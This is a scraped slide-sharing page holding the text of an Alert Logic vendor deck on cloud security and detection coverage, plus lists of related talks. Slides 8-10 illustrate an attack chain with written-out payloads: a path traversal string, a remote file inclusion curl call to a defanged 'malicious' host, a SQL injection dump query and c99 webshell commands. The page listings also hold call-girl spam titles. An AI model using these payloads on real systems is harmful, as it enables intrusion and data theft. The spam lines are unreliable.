Microsoft Azure Security Overview - Microsoft - CSS Dallas AzureMicrosoft Azure Security Overview - Microsoft - CSS Dallas Azure
Microsoft Azure Security Overview - Microsoft - CSS Dallas AzureAlert Logic
 

Plus de Alert Logic (20)

Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and Response
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: Presidio
 
Security Spotlight: Rent-A-Center
Security Spotlight: Rent-A-CenterSecurity Spotlight: Rent-A-Center
Security Spotlight: Rent-A-Center
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: Presidio
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
CSS 2018 Trivia
CSS 2018 TriviaCSS 2018 Trivia
CSS 2018 Trivia
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
The Intersection of Security and DevOps
The Intersection of Security and DevOpsThe Intersection of Security and DevOps
The Intersection of Security and DevOps
 
Security Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola CompanySecurity Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola Company
 
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload ProtectionReducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 
Microsoft Azure Security Overview - Microsoft - CSS Dallas Azure
Microsoft Azure Security Overview - Microsoft - CSS Dallas AzureMicrosoft Azure Security Overview - Microsoft - CSS Dallas Azure
Microsoft Azure Security Overview - Microsoft - CSS Dallas Azure
 

Dernier

Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 

Dernier (20)

Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 

Realities of Security in the Cloud

  • 1. REALITIES OF SECURITY IN THE CLOUD Mark Brooks VP, Sales Engineering, Alert Logic
  • 2. Security is a challenge.
  • 4. • Security Monitoring • Log Analysis • Vulnerability Scanning • Network Threat Detection • Security Monitoring • Secure Coding and Best Practices • Software and Virtual Patching • Configuration Management • Access Management (including multi- factor authentication) • Access Management • Configuration Hardening • Patch Management • TLS/SSL Encryption • Network Security Configuration • Web Application Firewall • Vulnerability Scanning • Application level attack monitoring • Hypervisor Management • System Image Library • Root Access for Customers • Managed Patching (PaaS, not IaaS) • Logical Network Segmentation • Perimeter Security Services • External DDOS, spoofing, and scanning monitored APPS CUSTOMER ALERT LOGICMICROSOFT VIRTUAL MACHINES NETWORKING INFRASTRUCTURE SERVICES Security in the Cloud is a Shared Responsibility
  • 5. Let’s talk about security coverage.
  • 6. Tame the Beast Industry Challenge: The Good, the Bad and the Ugly Known Good Known Bad Suspicious Allow Identify | Tune | Permit Block Drop | Reconfigure Application Stack Web Apps Server-side Apps App Frameworks Dev Platforms Databases Server OS Hypervisor Hardware Classification Action HUMAN EXPERT REQUIRED
  • 7. Classic 3-Tier Web Application Key Target Assets Key target assets for attack Across the Full Stack 1. Custom application 2. Web server implementation Apache, IIS, NGINGX 3. Application server implementation Tomcat, Jboss, Jetty, ASP 4. Web server frameworks and languages Struts, PHP, Java 5. Databases mySql, Oracle, MSSQL,.. 6. Azure Services VMs, Storage Azure VMs Azure VMs VNET Traffic Manager Users Internet gateway Load Balancers DB instance DB instance AvailabilityzoneAAvailabilityzoneB VMScale Sets Web App Server VMScale Sets Storage Blob Azure VMs Azure VMs
  • 8. An attack scenario - Recon VNET Traffic Manager Internet gateway LB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB Storage Bastion Host PHP Application On Linux 1 – Performs low-frequency app-scan 2 – Tests path traversal and enumerates directories 3 – Tests remote file inclusion Recon Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=.. /../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site- import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smash’n grab attacks as more persistent attack approaches
  • 9. Entry and data exfiltration • Attacker launches a series of SQL-I injection discovery attempts • Gets a dump-in-one-shot attack and gets full table return http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a) Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers An attack scenario – opportunistic exfiltration VNET Traffic Manager Internet gateway LB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB Storage Bastion Host PHP Application On Linux 4 - SQL-I data extraction attack Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches Entry/Exfil
  • 10. VNET Traffic Manager Internet gateway LB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB Storage Bastion Host PHP Application On Linux 5 - Webshell injection 6 - Commanding through Shell Command and control (C&C) • Attacker uploads c99 webshell via RFI vulnerability • Persistent foothold for lateral movement established curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99 Attacker achievements: obtained foothold for further action and lateral movement Entry and data exfiltration • Attacker launches a series of SQL-I injection attempts • Gets a dump-in-one-shot attack and gets full table return Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability (RFI) Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches An attack scenario – persistent foothold Command and control
  • 11. Deep Application threat visibility Network inspection Expert SOC Analysis of Findings Network, system, application infrastructure threat visibility Alert Logic’s Approach AuditLogs Config&VulnAssessment Foundation Asset and exposure visibility Log Collection HTTP Inspection Expert Curation, R&D of Content and Intel Analytics and Machine Learning Content and Intel Application level Web Attacks OWASP Top 10 Attacks against vulnerable platforms and libraries Attacks against miscon- figurations
  • 12. Coverage needed for this scenario Low slow scan Path traver sal RFI SQLi Web shell Recon Entry Exfil C&COverall combined coverage scorecard No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage How much can we see? AuditLogs
  • 13. Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Recon Entry Exfil C&C AuditLogs Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  • 14. Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Recon Entry Exfil C&C Network inspection AuditLogs Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  • 15. Deep Application threat visibility Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Deep HTTP inspection on requests and responses, learning and anomaly detection deepens coverage for whole classes of application attacks Recon Entry Exfil C&C Network inspection AuditLogs Config&VulnAssessment Log Collection HTTP Inspection Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  • 16. SECURITY EXPERTS Integrated Security Model Incident Investigation System Visual | Context | Hunt Data & Event Sources Assets | Config | Logs Automatic Detection Block | Alert | Log ML Algorithms Rules & Analytics Security Researchers Data Scientists Software Programmers Integrated: Infrastructure | Content | Human Experts Security Analysts
  • 17. We designed security for cloud and hybrid environments GET STARTED IN MINUTES MAINTAIN COVERAGE AT CLOUD SCALE KEEP PRODUCTION FLOWING with modular services that grow with you Comply with integration to cloud APIs and DevOps automation with auto-scaling support and out-of-band detection Single pane of glass for workload and application security across cloud, hosted & on-premises
  • 18. Leaders 28 8 6 4 10 25 3 5 5 11 8 10 15 24 Other Amazon Check Point Chronicle Data Cisco Fortinet Intel Security Okta Symantec Barricade JumpCloud Evident.io Palerra Microsoft CloudPassage CloudCheckr FortyCloud ThreatStack Alert Logic A recognized security leader “Alert Logic has a head start in the cloud, and it shows.” PETER STEPHENSON SC Magazine review “…the depth and breadth of the offering’s analytics and threat management process goes beyond anything we’ve seen…”Who is your primary in-use vendor for Cloud Infrastructure Security? Who are the top vendors in consideration for Cloud Infrastructure Security? Alert Logic
  • 19. Over 4,000 worldwide customers AUTOMOTIVE HEALTHCARE EDUCATION FINANCIAL SERVICES MANUFACTURING MEDIA/PUBLISHING RETAIL/E-COMMERCE ENERGY & CHEMICALS TECHNOLOGY & SERVICES GOV’T / NON-PROFIT